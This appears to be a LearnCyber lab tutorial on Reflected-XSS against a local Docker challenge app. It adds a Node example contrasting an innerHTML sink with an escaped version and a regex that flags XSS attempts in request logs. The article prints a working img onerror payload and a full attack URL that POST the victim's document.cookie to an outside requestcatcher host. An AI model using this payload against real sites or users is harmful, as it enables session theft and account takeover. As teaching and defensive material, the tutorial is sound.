Reflected-XSS Attacks

Web Exploitation
Practical
Article

In this article you will learn about Reflected-XSS attacks.

What are Reflected-XSS attacks?

Reflected-XSS (Reflected Cross-Site Scripting) attacks are XSS attacks, which means they involve injecting custom JavaScript code into a web page.

They differ from Self-XSS attacks in that a Reflected-XSS can be triggered without the user having to input the code into the page themselves, which makes them much more dangerous than the former.

Usually, this kind of attack is triggered by tricking the user into visiting a malicious link: malicious not because the website itself is malicious, but because some part of the URL triggers the execution of malicious code in the target page.

To understand better how this works, let's have a look at this example challenge.

To start the app, run docker compose up

Exploiting the application

When we visit http://localhost:8080 we come across the following page:

When we input something in the box and click the button, we can see that the URL changes, the page refreshes and the text below the title is updated:

If we check the source we see that the page links a main.js script:


Opening it, we can see that it sets the innerHTML of the description element to the value of the description search parameter.


Let's try changing the parameter in the URL to include an HTML element:

We can see that http://localhost:8080/?description=%3Cinput%2F%3E rendered the input field!

We can use the same payloads we used in the Self-XSS article to execute JavaScript in the page and send the cookies to our requestcatcher endpoint too:

<img onerror="fetch('https://learncyber.requestcatcher.com/cookies', {method: 'POST', body: document.cookie})" src=""/>

The final URL being:

http://localhost:8080/?description=%3Cimg%20onerror=%22fetch(%27https://learncyber.requestcatcher.com/cookies%27,%20%7Bmethod:%20%27POST%27,%20body:%20document.cookie%7D)%22%20src=%22%22/%3E

All an attacker needs to do is give this URL to a victim, and the victim will send their cookies to the attacker, as we can see here:

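The sink that makes this challenge exploitable is the one line in main.js that copies the description parameter into innerHTML. The following is an added example, not the challenge's own main.js: it models that sink next to a hardened version that treats the parameter as text, plus a hypothetical log-side check that flags query values carrying tags or event handlers. It runs under Node without a DOM, so each render function returns the markup that would end up inside the description element rather than touching a real element. The two URLs are the ones from this article; the check's regex is an assumption and only a heuristic.

```javascript
// Added example, not the challenge's own main.js. The render functions return
// the markup that would be inserted into the description element, which is
// the only thing that differs between the two sinks.

// Equivalent of what the article's main.js does: read ?description= and write
// it with `el.innerHTML = description`, so tags in the parameter get rendered.
function renderVulnerable(pageUrl) {
  const description = new URL(pageUrl).searchParams.get("description") ?? "";
  return description; // inserted verbatim, markup and all
}

// Hardened: `el.textContent = description` makes the browser treat the value
// as text; escaping before an HTML sink has the same effect. Server-side
// templating that reflects the parameter would need the same escaping.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderHardened(pageUrl) {
  const description = new URL(pageUrl).searchParams.get("description") ?? "";
  return escapeHtml(description);
}

// Hypothetical detection heuristic for a request log (not part of the
// challenge): decode every query value and flag an HTML tag opener or an
// inline on*= event handler. Tune the pattern before running it on real traffic.
function looksLikeReflectedXssAttempt(requestUrl) {
  for (const [, value] of new URL(requestUrl).searchParams) {
    if (/<\s*[a-z!/]|\bon[a-z]+\s*=/i.test(value)) return true;
  }
  return false;
}

// URLs taken from the article: the probe and the cookie-exfiltration link.
const PROBE_URL = "http://localhost:8080/?description=%3Cinput%2F%3E";
const PAYLOAD_URL = "http://localhost:8080/?description=%3Cimg%20onerror=%22fetch(%27https://learncyber.requestcatcher.com/cookies%27,%20%7Bmethod:%20%27POST%27,%20body:%20document.cookie%7D)%22%20src=%22%22/%3E";

console.log("vulnerable:", renderVulnerable(PROBE_URL)); // <input/>
console.log("hardened:", renderHardened(PROBE_URL));     // &lt;input/&gt;
console.log("flagged:", looksLikeReflectedXssAttempt(PAYLOAD_URL)); // true
```

With the hardened sink the exfiltration link from above renders as literal text, so the img element is never created and onerror never fires.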

That's it for Reflected-XSS attacks! Remember you can always try and test new payloads with this application if you feel like practicing!

Copyright © 2023 LearnCyber. All rights reserved.